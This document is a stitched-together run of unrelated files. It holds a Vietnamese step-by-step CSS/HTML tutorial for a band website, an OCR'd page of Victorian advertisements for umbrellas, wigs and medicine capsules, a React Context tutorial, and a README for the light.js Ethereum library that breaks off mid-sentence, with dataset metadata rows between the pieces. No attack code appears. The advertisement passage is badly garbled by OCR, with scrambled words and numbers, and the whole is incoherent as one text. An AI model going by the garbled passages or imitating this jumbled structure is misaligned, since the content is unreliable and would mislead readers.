</div> 72) Thêm Contact section <!-- Contact section --> <div class="content-section"> <h2 class="section-heading">CONTACT</h2> <p class="section-sub-heading">Fan? Drop a note!</p> </div> Tự lưu hình vào `assets/img/band` 73) Thêm `member-list` <div class="content-section"> <div class="member-list"> <div class="member-item"> <p class="member-name">Name</p> <img src="./assets/img/band/member1.jpeg" alt="Name" class="member-img"> </div> <div class="member-item"> <p class="member-name">Name</p> <img src="./assets/img/band/member1.jpeg" alt="Name" class="member-img"> </div> <div class="member-item"> <p class="member-name">Name</p> <img src="./assets/img/band/member1.jpeg" alt="Name" class="member-img"> </div> </div> </div> 74) Set 3 `.member-item` đứng chung 1 hàng #content .member-item { float: left; } 75) Thay đổi khoảng cách từ `.member-list` đến `.about-text` #content .member-list { margin-top: 48px; } 76) Chia đều `.member-list` thành 3 phần, tức là mỗi `.member-item` chiếm 33.33333% #content .member-item { width: 33.33333%; } Có thể sử dụng hàm để chia thành 33.33333% bằng `calc(100% / 3)` 77) Căn giữa `.member-list` #content .member-list { text-align: center; } 78) Thay đổi khoảng cách từ `.member-img` đến `.member-name` #content .member-img { margin-top: 15px; } 79) Thay đổi kích thước chiều ngang của `.member-img` #content .member-img { width: 154px; } 80) Bo tròn `.member-img` #content .member-img { border-radius: 4px; } 81) Khi ta select element `.member-list` thì trình duyệt không select toàn bộ 3 `.member-item` mà chỉ select 1 lớp nhỏ không liên quan. Đây là 1 lỗi khi sử dụng `float`. Nếu các thẻ con bên trong 1 thẻ cha sử dụng `float` thì thẻ cha bên ngoài sẽ bị co lại. Để khắc phục, chúng ta thêm 1 class là con của class cha `.member-list` có tên là clear. <div class="clear"></div> Phía CSS chúng ta set: .clear { clear: both; } Hoặc chúng ta thêm `overflow: hidden` vào thẻ cha `.member-list`. # 4. Tour tickets 82) Khi đổ nền đen, chúng ta chỉ đổ được nền ở Content, Padding nhưng không đổ được Margin. Để giải quyết, chúng ta tạo 1 thẻ `div` cha cho `content-section` và để nền đen cho thẻ `div` có tên là `tour-section` <div class="tour-section"> <div class="content-section"> <h2 class="section-heading">TOUR DATES</h2> <p class="section-sub-heading">Remember to book your tickets!</p> </div> </div> CSS: .tour-section { background-color: #000; } 83) Tạo class chữ màu trắng để sau này dùng lại nhiều lần. .text-white { color: #fff !important; } Dùng important khi class đó chỉ có 1 chức năng. Nếu dùng linh tinh rất khó kiểm soát. 84) Set chữ màu trắng cho `.section-heading` và `.section-sub-heading` bằng cách thêm class `text-white` <h2 class="section-heading text-white">TOUR DATES</h2> <p class="section-sub-heading text-white">Remember to book your tickets!</p> 85) Thêm thẻ ul chứa danh sách các đợt vé và `background-color` màu trắng cho nó. <ul class="ticket-list"> <li>September <span class="sold-out">Sold out</span></li> <li>October <span class="sold-out">Sold out</span></li> <li>November <span class="quantity">3</span></li> </ul> CSS: .ticket-list { background-color: #fff; } 86) Thay đổi khoảng cách từ `.ticket-list` đến `.section-sub-heading` .ticket-list { margin-top: 40px; } 87) Thay đổi cỡ chữ của thẻ `.ticket-list li` .ticket-list li { font-size: 15px; } 88) Căn đều ngang dọc cho thẻ `.ticket-list li` .ticket-list li { padding: 11px 16px; } 89) Tạo `border-bottom` cho `.ticket-list li` .ticket-list li { border-bottom: 1px solid #ddd; } 90) Thay đổi màu chữ cho `.ticket-list li` .ticket-list li { color: #757575; } 91) Thêm màu nên và màu chữ cho `.ticket-list .sold-out` .ticket-list .sold-out { background-color: #f44336; color: #fff; } 92) Padding cho `.ticket-list .sold-out` .ticket-list .sold-out { padding: 3px 4px; } 93) Vị trí của `.ticket-list .sold-out` .ticket-list .sold-out { margin-left: 16px; } 94) Di chuyển `.ticket-list .quantity` sang phải .ticket-list .quantity { float: right; } 95) Set chiều rộng, cao, màu nền và màu chữ cho `.ticket-list .quantity` .ticket-list .quantity { width: 24px; height: 24px; background-color: #000; color: #fff; } 96) Set bo tròn cho `.ticket-list .quantity` .ticket-list .quantity { border-radius: 50%; } 97) Căn giữa, căn dọc cho `.ticket-list .quantity` .ticket-list .quantity { text-align: center; line-height: 24px; } 98) `.ticket-list .quantity` vẫn cảm thấy bị lệch, chúng ta sử dụng `margin` âm .ticket-list .quantity { margin-top: -3px; } Để sử dụng `margin` âm thì class phải sử dụng `float` 1 thẻ đang có `inline` mà thêm `float` thì thẻ đó thành `block`. Khi có `block` rồi thì set được `width`, `height` 99) Bỏ dấu chấm của `.ticket-list li` .ticket-list li { list-style-type: none; } Lưu hình địa điểm lưu trong `assets/img/places` 100) Thêm `.place-list` và `place-item` <!-- Places --> <div class="place-list"> <div class="place-item"> <img src="./assets/img/places/place1.jpeg" alt="New York" class="place-img"> <div class="place-body"> <h3 class="place-heading">New York</h3> <p class="place-time">Fri 27 Nov 2016</p> <p class="place-dsc">Praesent tincidunt sed tellus ut rutrum sed vitae justo.<p> <a href="#" class="place-buy-btn">Buy Tickets</a> </div> </div> <div class="place-item"> <img src="./assets/img/places/place1.jpeg" alt="New York" class="place-img"> <div class="place-body"> <h3 class="place-heading">New York</h3> <p class="place-time">Fri 27 Nov 2016</p> <p class="place-dsc">Praesent tincidunt sed tellus ut rutrum sed vitae justo.<p> <a href="#" class="place-buy-btn">Buy Tickets</a> </div> </div> <div class="place-item"> <img src="./assets/img/places/place1.jpeg" alt="New York" class="place-img"> <div class="place-body"> <h3 class="place-heading">New York</h3> <p class="place-time">Fri 27 Nov 2016</p> <p class="place-dsc">Praesent tincidunt sed tellus ut rutrum sed vitae justo.<p> <a href="#" class="place-buy-btn">Buy Tickets</a> </div> </div> </div> 100) Thay đổi khoảng cách từ `.place-list` đến `.ticket-list` .place-list { margin-top: 32px; } 101) Dàn phải cho `.place-item` .place-item { float: left; width: 33.333333%; } 102) Lúc này, kích thước thẻ `img` là 400, to hơn thẻ chứa nó là `.place-item` nên `img` đã phìn ra. Chúng ta đi set `width: 100%` cho img thì sẽ fix được lỗi này. .place-img { width: 100%; } 103) Tạo ra khoảng cách giữa các `.place-item` .place-item { padding: 0 8px; } 104) Fix lỗi không ôm hết các element của `.place-list` bằng cách sử dùng class `.clear` <div class="clear"></div> 105) Hiện tại, `.place-item` 1 và 3 bị thụt vào trong, chúng ta cần `.place-item` 1 và 3 thẳng mép. Ta áp dụng kỹ thuật `margin` âm vào thẻ chứa các `.place-item`. .place-list { margin-left: -8px; margin-right: -8px; } 106) Hiệu ứng khi hover vào `img` .place-img:hover { opacity: 0.6; } 107) Tạo màu nền cho `.place-body` .place-body { background-color: #fff; } 108) `.img` đang có thuộc tính inline, `.place-body` đang có thuộc tính là block. Khi 2 ông này chồng lên nhau thì tạo ra 1 khoảng màu đen. Cách khắc phục là mình biến `.img` có thuộc tính là block. .place-img { display: block; } 109) Padding 4 hướng cho `.place-body` .place-body { padding: 16px; } 110) Set kích thước font cho `.place-body` và `.place-heading` .place-body { font-size: 15px; } .place-heading { font-size: 15px; font-weight: 600; } 111) Tạo khoảng cách giữa `.place-time` và `.place-heading` .place-time { margin-top: 15px; } 112) Thay màu chữ cho `.place-time` .place-time { color: #757575; } 112a) Tạo khoảng cách giữa `.place-dsc` và `.place-time` .place-dsc { margin-top: 15px; } 113) Chỉnh khoảng cách giữa các dòng của `.place-dsc` .place-dsc { line-height: 1.4; } 114) Chỉnh màu chữ, màu nền, bỏ gạch chân, padding cho `.place-buy-btn` .place-buy-btn { color: #fff; background-color: #000; text-decoration: none; padding: 11px 16px; } 115) Cho thuộc tính `inline` của `.place-buy-btn` thành `inline-block` .place-buy-btn { display: inline-block; } 116) Thay đổi khoảng cách từ `.place-buy-btn` đến `.place-dsc` .place-buy-btn { margin-top: 15px; } 117) Thêm hover cho `.place-buy-btn` .place-buy-btn:hover { color: #000; background-color: #ccc; } 118) Padding dưới đáy cho `.place-list ` .place-list { padding-bottom: 48px; } # 5. Modal 119) Tạo lớp Modal <div class="modal"> </div> CSS: .modal { position: fixed; top: 0; bottom: 0; left: 0; right: 0; background: rgba(0, 0, 0, 0.4); } 4 hướng bằng 0 cùng với `position: fixed` thì tạo ra 1 lớp phủ kín. 120) Thêm các icon, label ... vào modal <div class="modal"> <div class="modal-container"> <div class="modal-close"> <i class="modal-heading-icon ti-close"></i> </div> <header class="modal-header"> <ti class="ti-bag"></ti> Tickets </header> <div class="modal-body"> <label for="" class="modal-label"> <i class="ti-shopping-cart"></i> Tickets, $15 per person </label> <input type="text" class="modal-input" placeholder="How many?"> <label for="" class="modal-label"> <i class="ti-user"></i> Send To </label> <input type="email" class="modal-input" placeholder="Enter email"> <button id="buy-tickets"> Pay <i class="ti-check"></i> </button> </div> <footer class="modal-footer"> <p class="modal-help">Need <a href="#">help?</a></p> </footer> </div> </div> 121) Căn `.modal-container` ra giữa màn hình bằng cách thêm vào thẻ cha chứa `.modal` Sử dụng flexbox, biến `.modal` thành `display: flex`. Tại `.modal` thêm `align-items: center`, lúc này `.modal-container` sẽ nào giữa chiều cao của `.modal`. Tiếp tục thêm `justify-content: center` và `.modal` để `.modal-container` nằm giữa chiều ngang của `.modal` .modal { display: flex; align-items: center; justify-content: center; } 122) Thêm màu nền cho `.modal-container` .modal .modal-container { background-color: #fff; } 123) Thay đổi kích thước cho `.modal-container` .modal .modal-container { width: 900px; min-height: 200px; } Để `min-height` để khi content nhiều thì nó sẽ dãn ra theo chiều cao. 124) Set màu nền và chiều cao cho `.modal-header` vì chiều rộng đã được set sẵn ở `.modal` rồi. .modal-header { background: #009688; height: 130px; } 125) Căn giữa, set font-size và màu cho `Tickets` .modal-header { display: flex; align-items: center; justify-content: center; font-size: 30px; color: #fff; } 126) Cho `.modal-heading-icon` dịch sang phải .modal-heading-icon { margin-right: 16px; } 127) Thêm thuộc tính relative và absolute vào `.modal .modal-container` và `.modal-close` để `.modal-close` nằm trong `.modal .modal-container` .modal .modal-container { position: relative; } .modal-close { position: absolute; } 128) Cho `.modal-close` dịch lên trên và sang trái .modal-close { top: 0; right: 0; } 129) Set màu chữ, padding, opacity cho `.modal-close` .modal-close { color: #fff; padding: 12px; opacity: 0.8; } Lý do chúng ta không sử dụng top, right để kéo dấu close vào trong mà dùng padding là vì khi dùng padding, chúng ta sẽ chọn được 1 vùng lớn khi nhấn vào. Còn khi dùng top, right thì chỉ click vào đúng icon thì mới chạy. 130) Thêm hover cho `.modal-close` .modal-close:hover { opacity: 1; cursor: pointer; } 131) Lùi `.modal-body` vào trong .modal-body { padding: 16px; } 132) Input và label đang nằm trên cùng 1 hàng, nó đang có dạng `display: inline-block` là nằm trên cùng 1 hàng. Bây giờ chúng ta chuyển thành `display: block` vào input hoặc label để input và label nằm mỗi hàng riêng biệt. Đồng thời đổi font-size. .modal-label { display: block; font-size: 15px; } 133) Thay đổi kích thước ô input, chúng ta sử dụng padding. Để sau này nếu thay đổi font chữ thì ô input sẽ tự cao theo. Đồng thời set độ rộng 100%, thay đổi font chữ và border cho input. .modal-input { font-size: 15px; border: 1px solid #ccc; width: 100%; padding: 10px; } 134) Thay đổi khoảng cách từ label xuống ô input .modal-label { margin-bottom: 12px; } 135) Thay đổi khoảng cách từ input xuống label .modal-input { margin-bottom: 24px; } 136) Đặt cho thẻ input 1 id và truyền id đó vào thuộc tính for="" của label. Khi click vào label thì sẽ tự động focus vào input. <label for="ticket-quantity" class="modal-label"> <i class="ti-shopping-cart"></i> Tickets, $15 per person </label> <input id="ticket-quantity" type="text" class="modal-input" placeholder="How many?"> 137) Thêm màu nền, màu chữ, độ rộng, cỡ chữ, thay đổi border, kiểu chữ và độ rộng cho `#buy-tickets` #buy-tickets { background-color: #009688; color: #fff; width: 100%; font-size: 15px; border: none; text-transform: uppercase; padding: 18px; } 138) Thêm hover cho `#buy-tickets` #buy-tickets:hover { opacity: 0.9; cursor: pointer; } 139) Tăng độ rộng của Footer và cho nằm sang phải .modal-footer { padding: 16px; text-align: right; } 140) Chỉnh màu chữ cho `.modal-footer a` .modal-footer a { color: #2196f3; } 141) Reponsive cho `.modal` .modal .modal-container { max-width: calc(100% - 32px); } width sẽ luôn cách mỗi bên là `11px` khi chúng ta co lại. 142) Thêm `.modal.open` .modal.open { display: flex; } 143) Tại `.modal`, đổi `display: flex` thành `.display: none` .modal { display: none; } 144) Thêm một số class JS <div class="modal js-modal"> <div class="modal-container js-modal-container"> <div class="modal-close js-modal-close"> <button class="place-buy-btn js-buy-ticket">Buy Tickets</button> 145) Thêm Javascript const buyBtns = document.querySelectorAll('.js-buy-ticket'); const modal = document.querySelector('.js-modal'); const modalClose = document.querySelector('.js-modal-close'); const modalContainer = document.querySelector('.js-modal-container'); function showBuyTickets() { modal.classList.add('modal-open'); } function hideBuyTickets() { modal.classList.remove('modal-open'); } for (const buyBtn of buyBtns) { buyBtn.addEventListener('click', showBuyTickets); } modalClose.addEventListener('click', hideBuyTickets); modal.addEventListener('click', hideBuyTickets); modalContainer.addEventListener('click', function(event) { event.stopPropagation(); }); 146) Thêm một số hiệu ứng chuyển động @keyframes modalFadeIn { from { opacity: 0; transform: translateY(-140px); } to { opacty: 1; transform: translateY(0); } } 147) Thêm thuộc tính `animation` cho `.modal .modal-container` .modal .modal-container { animation: modalFadeIn ease 0.3s; } # 6. Row - columns layout Tạo các class chung gồm `row` và `column` 148) Tạo `.row` .row { margin-left: -8px; margin-right: -8px; } 149) Ẩn `margin-left` và `margin-right` ở `.place-list` .place-list { // margin-left: -8px; // margin-right: -8px; } 150) Thêm vào `<div class="place-list">` class `.row` <div class="row place-list"> 151) Tạo `.col` .col { float: left; padding-left: 8px; padding-right: 8px; } 152) Ẩn `float`, `padding-left` và `padding-left` ở `.place-item` .place-item { //float: left; width: 33.333333%; //padding: 0 8px; } 153) Thêm vào `<div class="place-item">` class `col` <div class="col place-item"> 154) Tạo `.col-third` .col-third { width: 33.33333%; } 155) Ẩn `width: 33.33333%` trong `.place-item` .place-item { //float: left; //width: 33.33333%; //padding: 0 8px; } 156) Tại `<div class="col place-item">` thay `place-item` thành `col-third`. 157) Tại `#content .member-item` ẩn `width: 33.33333%;` #content .member-item { float: left; //width: 33.33333%; } 158) Thêm `col-third` vào `<div class="member-item">` <div class="member-item col-third"> 159) Thêm `.text-center` .text-center { text-align: center !important; } 160) Thêm `.col-half` .col-half { width: 50%; } 161) Thêm `.col-full` .col-full { width: 100%; } # 7. Contact form 162) Tạo 1 `row` chứa 2 `column` <div class="row"> <div class="col col-half"> <p><i class="ti-location-pin"></i> Chicago, US</p> <p><i class="ti-mobile"></i> Phone: +00 151515</p> <p><i class="ti-email"></i> Email: [email protected]</p> </div> <div class="col col-half"> <form action=""> <div class="row"> <div class="col col-half"><input type="text" name="" placeholder="Name" id="" class="form-control"></div> <div class="col col-half"><input type="email" name="" placeholder="Email" id="" class="form-control"></div> </div> <div class="row"> <div class="col col-full"> <input type="text" name="" placeholder="Message" id="" class="form-control"> </div> </div> <input type="submit" value="SEND"> </form> </div> </div> 163) Thêm class `contact-content` vào `<div class="row">` <div class="row contact-content"> 164) Thay đổi khoảng cách từ `contact-content` lên `section-sub-heading` của phần **Contact** .contact-content { margin-top: 48px; } 165) Thêm vào `<div class="col col-half">` đầu tiên class `contact-info` <div class="col col-half contact-info"> 166) Set font-size cho `.contact-info` .contact-info { font-size: 18px; } 167) Thay đổi khoảng cách giữa icon và text cho `.contact-info` Nên sử dụng `width` thay vì `margin`. Vì trong thực tế, 1 số icon có kích thước chiều rộng khác nhau nên sẽ dẫn đến text có thể bị lệch nếu sử dụng `margin` .contact-info i[class*="ti-"] { width: 30px; display: inline-block; } CSS Selector nâng cao: .contact-info i[class*="ti-"] Chọn tất cả các thẻ `i` có tiền tố `ti-` là con của `.contact-info` 168) Thay đổi khoảng cách giữa 2 dòng chữ của `.contact-info` .contact-info { line-height: 1.4; } 169) Thêm vào `<div class="col col-half">` thứ 2 class `contact-form` <div class="col col-half contact-form"> 170) Set `font-size` cho `.contact-form"` .contact-form { font-size: 15px; } 171) Customize lại `input` cho `.form-control` .contact-form .form-control { padding: 10px; border: 1px solid #ccc; width: 100%; } Có thể bỏ outline của thẻ input bằng thuộc tính `outline: none` 172) Thêm div `clear` vào sau `<div class="row">` <div class="clear"></div> Hoặc chúng ta cũng có thể sử dụng Pseudo cho `.row` bằng cách .row::after { content: ""; display: block; clear: both; } thay vì cứ phải thêm 1 div `clear` như trước. 173) Tạo 1 class `.mt-8` để `margin-top: 8px` .mt-8 { margin-top: 8px !important; } 174) Thêm class `mt-8` vào input **Message** của `contact-form` <div class="col col-full mt-8"> 175) Tạo 1 class `.mt-16` để `margin-top: 16px` .mt-16 { margin-top: 16px !important; } 176) Thêm class `mt-16` vào `<input type="submit" value="SEND">` <input class="mt-16" type="submit" value="SEND"> 177) Thêm class `form-submit-btn` vào `<input class="mt-16" type="submit" value="SEND">` <input class="mt-16" type="submit" value="SEND"> 178) Customize lại `.form-submit-btn ` .contact-form .form-submit-btn { background-color: #000; color: #fff; border: 1px solid #000; padding: 10px 16px; float: right; } 179) Thêm thuộc tính required vào thẻ input để có validate mặc định. <input type="text" name="" placeholder="Message" id="" class="form-control" required> 180) Đổi `place-buy-btn` thành `btn` ở cả HTML lẫn CSS // .place-buy-btn .btn { color: #fff; background-color: #000; text-decoration: none; padding: 11px 16px; display: inline-block; margin-top: 15px; } 181) Đổi `form-submit-btn` thành `btn` ở HTML, ở CSS xóa đi. 182) Ẩn border của `.btn` đi .btn { border: none; } 183) Thêm style cusor cho `.btn` khi hover vào .btn:hover { cursor: pointer; } 184) Thêm `.pull-right` .pull-right { float: right !important; } 185) Thêm `pull-right` vào `<input class="mt-16 btn" type="submit" value="SEND">` <input class="mt-16 btn pull-right" type="submit" value="SEND"> Lưu ảnh map vào `assets/img` # 8. Map 186) Thêm `map-section` và sau **Contact section** <div class="map-section"> <img src="./assets/img/map.jpeg" alt="Map"> </div> 187) Set `width` cho `img` .map-section img { width: 100%; } # 9. Footer 188) Thêm `social-list` và `copyright` <div id="footer"> <div class="socials-list"> <a href=""><i class="ti-facebook"></i></a> <a href=""><i class="ti-instagram"></i></a> <a href=""><i class="ti-youtube"></i></a> <a href=""><i class="ti-pinterest"></i></a> <a href=""><i class="ti-twitter"></i></a> <a href=""><i class="ti-linkedin"></i></a> </div> <p class="copyright">Powered by <a href="w3.css">w3.css</a></p> </div> 189) Thêm `#footer` có `padding` và căn giữa #footer { padding: 64px 16px; text-align: center; } 190) Set `font-size` cho `.social-list` #footer .socials-list { font-size: 24px; } 191) Đổi màu chữ và xóa gạch chân của thẻ `a` #footer .socials-list a { color: rgba(0, 0, 0, 0.6); text-decoration: none; } 192) Thêm hover cho `#footer .social-list a` #footer .socials-list a:hover { opacity: 0.4; } 193) Thay đổi khoảng cách từ `.copyright` lên `.social-list` và màu chữ #footer .copyright { margin-top: 15px; color: rgba(0, 0, 0, 0.6); } 194) Đổi màu chữ cho `#footer .copyright a` #footer .copyright a { color: rgba(0, 0, 0, 0.6); } 195) Thêm hover cho `#footer .copyright a` # 9. Review 196) Thêm vào mỗi `div` 1 `id`, sau đó lên Navigation thêm vào href của từng mục `#id` đó. Khi click vào Navigation sẽ tự động trỏ vào phần chứa `id` đó. 197) Thêm vào thuộc tính `scroll-behavior` cho `html` để scroll mượt hơn. html { scroll-behavior: smooth; }
23.114869
718
0.629966
vie_Latn
0.996365
bb1b3c4aeb61975a180176b8afb21d3bc1ff07d0
3,868
md
Markdown
_includes/pages/page00148.md
barmintor/ed-DCP
bd57a74f62eae1230d514d0bd7a09712b7881f1f
[ "MIT" ]
null
null
null
_includes/pages/page00148.md
barmintor/ed-DCP
bd57a74f62eae1230d514d0bd7a09712b7881f1f
[ "MIT" ]
null
null
null
_includes/pages/page00148.md
barmintor/ed-DCP
bd57a74f62eae1230d514d0bd7a09712b7881f1f
[ "MIT" ]
null
null
null
ADVERTISEMENTS. 11 - .--- - --- ALPACA UMBRELLAS. THE superiority of Alpaca over every other material for Umbrellas, being now generally acknowledged, and the Patentees having granted licenses to several of the largest Manufacturers, the Public are respectfully informed that they may be procured of most Umbrella Dealers in the Kingdom, at the price of 10s. 6d. and upwards. W. & J. SANGSTER, 140, Regent Street ; 94, Fleet Street ; and 10, Royal Exchange. N.B.Upwards of 35,000 of these Umbrellas have been already sold. W. & J. S. have also always on hand a very extensive Stock of cheap SILK UMBRELLAS, From 7s. to 10s. 6d. ; and best ditto from 15s. to 21s. S. STRAKEE'S LITHOCRAPHIC&ENCRAVINC ESTABLISHMENT N9 80, BISHOPSGATE ST WITHIN LONDON. DRAWINCS,MAPS,PtANS.FC SIMILES,WUITINGS.LABELS.MANUFACTURERSPATTERN$&c&c OFEVERY DESCRIPTION IN THEFIRSTSTYLE WITHECONOMY & EXPEDITION, STRAKER'S NEW & IMPRUVEU SIUC, k u r ~ l l i n lL ~ V ~rKtsJita, K which for every character of work stands unrivalled; in sizes from 15 by 20 Inches upwards. IMPORTER OF LITHOGRAPHIC STONES, The most extensive Stocks of which are constantly on hand and a t the lowest current rates. DETAILED PRICE LISTS Of Presses, and every Material and Instrument in the art, together with Designs, forwarded on application. Instruction in the Art afforded to Amateurs and Public Institutions. T H E GENTLEMAN'S REAL HEAD OF HAIR or INVISIBLE PERUKE The principle upon which this Peruke is made is so superior to everything yet produced, that the Manufacturer invites the honour of a visit from the Sceptic and the Connoisseur, that one may be convinced and the other gratified, by inspecting this and other novel and beautiful specimens of the Perruqueian Art, at the establishment of the Sole Inventor, F. Browne, 47, FENCHURCH-ST. F. BROWNE'S INFALLIBLE MODE OF MEASURING T H E HEAD. Round the head in the manner of a fillet ,1e a v n g A t d Inches. Eighths, the Ears loose .................................................... - ----- From the Forehead over to the poll, as deep each/ As dotted way as required ................................................ 2 to 2. - 1 - -- From one Temple to the other, across the rise or: As marked Crown of the head to where the Hair grows ............I - 3 to 3. THE CHARGE FOR THIS UNIQUE HEAD O F HAIR ONLY 21 10s. B A L S A M COPAIBA, and all other medicines of a nauseous character may now be taken without inconvenieace, by means of the PATENT ORGANIC CAPSULES. Thesecapsules will be found superior to those made with Gelatine. They remain entire until they have passed through the stomach into the intestines. and the medicine being efficiently brought in contact with the organs it is intended to affect, the usual nausea and unpleasant eructations are avoided. EVANS& LESCHER, London, Patentees; and all Medicine Vendore throughout the kingdom. *,* Ask for the Patent Plexible Capsules.
61.396825
114
0.56696
eng_Latn
0.985715
bb1bddb1bec5f8925dcaa070810020518ad2824c
4,090
md
Markdown
step2-04/demo/README.md
wiljwang/frontend-bootcamp
8850d877cf25b54b4eb90165de39ffcc19e33d42
[ "CC-BY-4.0", "MIT" ]
1
2021-02-19T00:23:21.000Z
2021-02-19T00:23:21.000Z
step2-04/demo/README.md
wiljwang/frontend-bootcamp
8850d877cf25b54b4eb90165de39ffcc19e33d42
[ "CC-BY-4.0", "MIT" ]
null
null
null
step2-04/demo/README.md
wiljwang/frontend-bootcamp
8850d877cf25b54b4eb90165de39ffcc19e33d42
[ "CC-BY-4.0", "MIT" ]
1
2021-02-19T00:46:30.000Z
2021-02-19T00:46:30.000Z
# Step 2.4 - React Context (Demo) [Lessons](../..) | [Exercise](../exercise) In this step, we describe some problems we encounter when creating a more complex application. We will solve these problems with the [React Context API](https://reactjs.org/docs/context.html). The Context API consists of Provider and Consumer components. Let's take a look at what is in this step: 1. The problem of complex applications 2. React Context API 3. Consuming context from a class component 4. Consuming context from a functional component ## The problem of complex applications React represents a single component like this: ``` (props) => view; ``` In a real application, these functions are composed. It looks more like this: ![](../../assets/todo-components.png) Being able to compose components is helpful, but it introduces some complexity: 1. Data needs to be passed down from component to component via props--even if some of the intermediate components don't need to know about some of the data. This is a problem called **props drilling**. 2. Shared data can be changed by various actors (user interaction, updates from server), and there is no coordination of these changes. This makes propagating updates between components challenging. Even in our simple application, we saw this problem. For example, `<TodoList>` has this props interface: ```ts interface TodoListProps { complete: (id: string) => void; remove: (id: string) => void; todos: Store['todos']; filter: FilterTypes; edit: (id: string, label: string) => void; } ``` None of these props are used in the `TodoList` itself; they're only passed down to child `TodoListItem` components: ```js <TodoListItem todos="{todos}" complete="{complete}" remove="{remove}" edit="{edit}" /> ``` ## React Context API Let's solve these problems with the [React Context API](https://reactjs.org/docs/context.html). Context is React's way to share data from components with their child components without explicitly passing it down through props at every level of the tree. In simpler terms, it solves the props drilling issue mentioned above! React context is created by calling `createContext()` with some initial data. Use the `<TodoContext.Provider>` component to wrap a part of the component tree that should be handed the context. ### Providing context with `<TodoContext.Provider>` ```js // To create an empty context const TodoContext = React.createContext(undefined); class TodoApp extends React.Component { render() { // Pass in some state and functions to the provider's value prop return ( <TodoContext.Provider value={{ ...this.state, addTodo: this._addTodo, setFilter: this._setFilter, /* same goes for remove, complete, and clear */ }} > <div> <TodoHeader /> <TodoList /> <TodoFooter /> </div> </TodoContext.Provider> ); } } ``` ### Consume context from a class component Inside a class-based child component, such as `<TodoHeader>`, the context created in the parent can be accessed via `this.context`. Note that for this to work, you must also set the component class's `contextType` property to the context type created above. ```js class TodoHeader extends React.Component { render() { // Step 1: use the context prop return <div>Filter is {this.context.filter}</div>; } } // Step 2: be sure to set the contextType property of the component class TodoHeader.contextType = TodoContext; ``` ### Consume context from a functional component If you're using the functional component syntax, you can access the context with the `useContext()` hook: ```js const TodoFooter = (props) => { const context = useContext(TodoContext); return ( <div> <button onClick={context.clear()}>Clear Completed</button> </div> ); }; ``` > Note that `useContext()` requires a recent release of React (16.8+) There is another legal syntax for accessing context with the `<TodoContext.Consumer>`, but we'll leave that out as an exercise for you!
34.369748
323
0.713692
eng_Latn
0.986068
bb1be12e17329e8be6633c018fa6e7c91cf8e3b7
7,081
md
Markdown
README.md
parity-js/light.js
3408ca5f2531d82f240600cf77cfe629c0138c31
[ "MIT" ]
9
2018-05-28T13:13:09.000Z
2018-11-21T02:04:28.000Z
README.md
parity-js/light.js
3408ca5f2531d82f240600cf77cfe629c0138c31
[ "MIT" ]
2
2018-05-28T15:58:31.000Z
2018-07-19T07:22:56.000Z
README.md
parity-js/light.js
3408ca5f2531d82f240600cf77cfe629c0138c31
[ "MIT" ]
2
2018-07-23T09:36:20.000Z
2018-07-23T18:51:53.000Z
# IMPORTANT **This repository is not maintained anymore. It has been moved to https://github.com/paritytech/js-libs/tree/master/packages/light.js**. # @parity/light.js A high-level reactive JS library optimized for light clients. [Documentation](https://parity-js.github.io/light.js/) ## Getting Started ```bash yarn install @parity/light.js ``` ## Usage Reactively observe JSONRPC methods: ```javascript import { defaultAccount$ } from '@parity/light.js'; defaultAccount$().subscribe(publicAddress => console.log(publicAddress)); // Outputs your public address 0x... // Everytime you change your default account (e.g. via MetaMask), it will output your new public address ``` All RxJS tools are available for manipulating Observables: ```javascript import { balanceOf$, blockNumber$, defaultAccount$ } from '@parity/light.js'; import { filter, map, switchMap } from 'rxjs/operators'; // Only log pair blocks blockNumber$() .pipe(filter(n => n % 2 === 0)) .subscribe(console.log); // Get the balance of the default account // Will update when balance or default account changes defaultAccount$() .pipe( switchMap(balanceOf$), map(value => +value) // Return number instead of BigNumber ) .subscribe(console.log); // There's actually an alias for the above Observable: import { myBalance$ } from '@parity/light.js'; myBalance$().subscribe(console.log); ``` Contract support: ```javascript import { defaultAccount$, makeContract } from '@parity/light.js'; import { map, switchMap } from 'rxjs/operators'; defaultAccount$() .pipe( switchMap(defaultAccount => makeContract(/* contract address */, /* abi */) .myMethod$(defaultAccount) // Calling method of contract with arguments ) ) .subscribe(console.log); // Will log the result, and everytime the result changes ``` All available methods are documented [in the docs](https://parity-js.github.io/light.js/). ## Usage with React The libray provides a higher-order component to use these Observables easily with React apps. ```javascript import light from '???'; // ??? to be decided import { syncing$ } from '@parity/light.js'; @light({ syncingVariable: syncing$ }) class MyClass extends React.Component { render() { return <div>{JSON.stringify(this.props.syncingVariable)}</div>; } } ``` The UI will automatically update when the syncing state changes. ## Advanced Usage ### Frequency Each Observable has a frequency upon which it is called. The frequency is documented in each method's [documentation](https://parity-js.github.io/light.js/). For example, the frequency of `balanceOf$` is: `frequency: [onStartup$, onEvery2Blocks$]` which means that the underlying JSONRPC call `eth_getBalance` will be made once when the Observable is subscribed (on startup), and once every 2 blocks. For the needs of your dapp, you can change the frequency of all Observables like this: ```javascript import { balanceOf$, onEvery2Seconds$, onStartup$ }; balanceOf$.setFrequency([onStartup$, onEvery2Seconds$]); balanceOf$('0x123').subscribe(console.log); // `eth_getBalance` will be called once immediately, and once every 2 seconds ``` A list of possible frequency Observables is here [TODO doc link], but you can of course put any array of Observables you want. ### RPC Overview To see an overview of all currently active Observables, type `window.parity.rpcOverview()` in the browser console. The output will be: ```javascript { accounts$: { calls: ['eth_accounts'], frequency: ['onAccountsChanged$'], subscribersCount: 4 }, balanceOf$: { calls: ['eth_getBalance'], frequency: ['onEvery2Blocks$', 'onStartup$'], subscribersCount: 2 }, defaultAccount$: { dependsOn: ['accounts$'], subscribersCount: 3 }, height$: { frequency: ['onEveryBlock$'], subscribersCount: 2 }, me$: { dependsOn: ['defaultAccount$'], subscribersCount: 1 }, syncing$: { frequency: ['onSyncingChanged$'], subscribersCount: 1 } } ``` The keys are the Observables you are using in your dapp, each containing an object where: - `calls`: the underlying JSONRPC calls made. - `dependsOn`: means that the current Observable depends on other Observables, so it doesn't make any JSONRPC calls itself, and doesn't have a frequency. - `frequency`: the frequency upon which the Observable is called. - `subscribersCount`: the number of subscribers this Observable has. This output can of course be different on different pages of your dapp, if they use different Observables. ## Notes about Implementation ### Observables are cold The underlying JSONRPC method is only called if there's at least one subscriber. ```javascript import { balanceOf$ } from '@parity/light.js'; const myObs$ = balanceOf$('0x123'); // Observable created, but `eth_getBalance` not called yet const subscription = myObs$.subscribe(console.log); // `eth_getBalance` called for the 1st time // Some other code... subscription.unsubscribe(); // `eth_getBalance` stops being called ``` ### Observables are PublishReplay(1) Let's take `blockNumber()$` which fires blocks 7, 8 and 9, and has 3 